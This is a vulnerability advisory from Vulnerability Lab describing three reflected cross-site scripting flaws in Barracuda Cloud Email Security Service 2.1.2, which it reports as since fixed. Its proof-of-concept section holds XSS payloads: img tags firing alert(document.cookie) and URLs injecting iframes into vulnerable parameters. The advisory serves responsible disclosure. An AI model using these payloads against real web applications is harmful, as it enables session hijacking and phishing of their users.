Barracuda Cloud ESS 2.x - Multiple Cross Site Vulnerabilities, Non-Persistent XSS in Barracuda Email Security v2.1.
Document Title:
===============
Barracuda Cloud ESS 2.x - Multiple Cross Site Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=742
Barracuda Networks Security ID: BNSEC-671
Release Date:
=============
2018-07-23
Vulnerability Laboratory ID (VL-ID):
====================================
742
Common Vulnerability Scoring System:
====================================
4.4
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
The Barracuda Email Security Service is a comprehensive and affordable cloud-based email security service that protects both
inbound and outbound email against the latest spam, viruses, worms, phishing and denial of service attacks. Barracuda Email
Security Service also includes email encryption and Data Loss Prevention features. The Barracuda Email Security Service
leverages advanced security technologies from the industry-leading Barracuda Spam & Virus Firewall and features rich multiple
cloud-based protection:
Rate control and Denial of Service (DoS) protection
Reputation-based blocking from known spam and malware sources
Anti-virus, featuring the patent-pending Barracuda Anti-Virus Supercomputing Grid
Anti-phishing, using the Barracuda Anti-Fraud Intelligence
Protection against spam, phishing, fraud and emails with other malicious intent
Custom sender/recipient policy
(Copy of the Vendor Homepage: https://www.barracudanetworks.com/ns/products/bess_overview.php )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple cross site vulnerabilities in the official cloud-based
Barracuda Networks Email Security v2.1.2 appliance application service.
Vulnerability Disclosure Timeline:
==================================
2017-07-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: EMail Security Service Application Appliance (Cloud-Based) 2.1.2
Barracuda Networks
Product: Cloud Control Center 2.1.2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Bug Bounty Program
Technical Details & Description:
================================
Multiple non persistent input validation vulnerabilities has been discovered in the cloud-based Barracuda Email Security v2.1.2 Appliance Application Service.
The client-side cross site scripting vulnerability allow remote attackers to inject own malicious script codes to client-sude application to browser requests.
1.1
The first vulnerability is located in the `domain manager module - remove domain` function when processing to request the invalid exception-handling
redisplay message (Confirmation required) form context. The application does not encode the displayed message context with the invalid value of the
exception-handling. The application executes the script code on the client-side in the main error message body context. The attack vector of the issue
is client-side (non-persistent) and the request method to inject is POST.
1.2
The second vulnerability is located in the `custom_rbls` parameter of the `bulk_edit` module context. The vulnerability allows to inject own script codes
to the client-side through the vulnerable `bulk_edit` form web context. The script code execution takes place in the bulk_edit form next to the custom_rbls
parameter input. The attack vector of the issue is client-side (non-persistent) and the request method to inject is POST.
1.3
The third vulnerability is located in the `attachment_filters` of the `bulk_edit` form module. The vulnerability allows to inject own script codes
to the client-side through the vulnerable `bulk_edit` form web context. The script code execution takes place in the bulk_edit form next to the
attachment_filters parameter input. The attack vector of the issue is client-side (non-persistent) and the request method to inject is POST.
Exploitation of the three cross site scripting vulnerabilities does not a privileged application user account but low or medium user interaction.
Successful exploitation of the client-side vulnerabilities results in session hijacking (customer/admin), client-side phishing, client-side external redirects to
malicious source and client-side manipulated of affected or connected module context.
Request Method(s):
[+] POST
[+] GET
[+] GET
Vulnerable Module(s):
[+] Domains Manager - Domains - Remove Domains Function
[+] Inbound Settings - Custom RBLs
[+] Message - attachment_filters
Vulnerable Parameter(s):
[+] remove_domain - ID+
[+] list custom_rbls
[+] list attachment_filters
Proof of Concept (PoC):
=======================
The client side input validation vulnerabilities can be exploited by remote attackers without privileged user account and with low or medium user interaction.
For security demonstration or to reproduce the multiple security vulnerabilities follow the provided information and steps below to continue.
PoC: Exploitation
<html>
<head><body>
<title>Barracuda Cloud ESS 2.x - PoC Multiple Cross Site Vulnerabilities</title>
<img src="https://ess.localhost:1338/settings/bulk_edit/attachment_filters%22" onload=alert(document.cookie)></img>
<img src="https://ess.localhost:1338/settings/bulk_edit/custom_rbls%22" onload=alert(document.cookie)></img>
<img src="https://ess.localhost:1338/domains/remove_domain/2" onload=alert(document.cookie)></img>
</body></head>
<html>
1.1 PoC: Domains Manager - Domains - Remove Domains Function - ID + Script Code - Invalid Exception-Handling - Display Script Code to Bypass Filter Check
<div id="page-hd">
<h2>Confirmation required</h2>
</div>
<div style="position: absolute; top: 86px; left: 0px; right: 0px; bottom: 0px; overflow: auto;" id="ess-content">
<form method="post"
action="/domains/remove_domain/SCRIPT>"> <[NON-PERSISTENT SCRIPT CODE INJECTION/EXECUTION!]">
>"<script>[removed]=true;<"> <[NON-PERSISTENT SCRIPT CODE INJECTION/EXECUTION!]>
<p>Are you sure you want to delete this domain? Deleting a domain will remove all associated settings and verification status.</p>
<p>
PoC: Link
https://ess.localhost:1338/domains/remove_domain/4[ID+][NON-PERSISTENT SCRIPT CODE INJECTION!];%22%3E%20%3Ciframe%20src=http://vuln-lab.com%3E
1.2 PoC: Inbound Settings - Custom RBLs
<p>Invalid bulk edit list custom_rbls"><iframe src="custom_rbls-[NON-PERSISTENT SCRIPT CODE EXECUTION!]" onload="alert("vl")" <<="" p="">
<p><a href="http://ess.barracudanetworks.com/settings"
class="btn"><span><span> OK
</span></span></a></p>
</div>
</div> <!-- ess-container -->
PoC: Link
https://ess.localhost:1338/settings/bulk_edit/custom_rbls%22%3E[NON-PERSISTENT SCRIPT CODE INJECTION!]
1.3 PoC: Message - Attachment_Filters
<p>Invalid bulk edit list attachment_filters"><iframe src="attachment-filters_bedit-Dateien/a.htm" [NON-PERSISTENT SCRIPT CODE EXECUTION!];)" <<="" p="">
<p><a href="http://ess.barracudanetworks.com/settings"
class="btn"><span><span> OK
</span></span></a></p>
</div>
PoC: Link
https://ess.localhost:1338/settings/bulk_edit/attachment_filters%22[NON-PERSISTENT SCRIPT CODE INJECTION!]
References:
https://ess.localhost:1338/domains/remove_domain
https://ess.localhost:1338/settings/bulk_edit/custom_rbls
https://ess.localhost:1338/settings/bulk_edit/attachment_filters
Solution - Fix & Patch:
=======================
The issue was reported in 2016 Q4. The issue was resolved in 2017 Q1 - Q4. The disclosure process took about 7 month.
Security Risk:
==============
The security risk of the multiple client-side cross site scripting web vulnerabilities in the cloud ess application are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo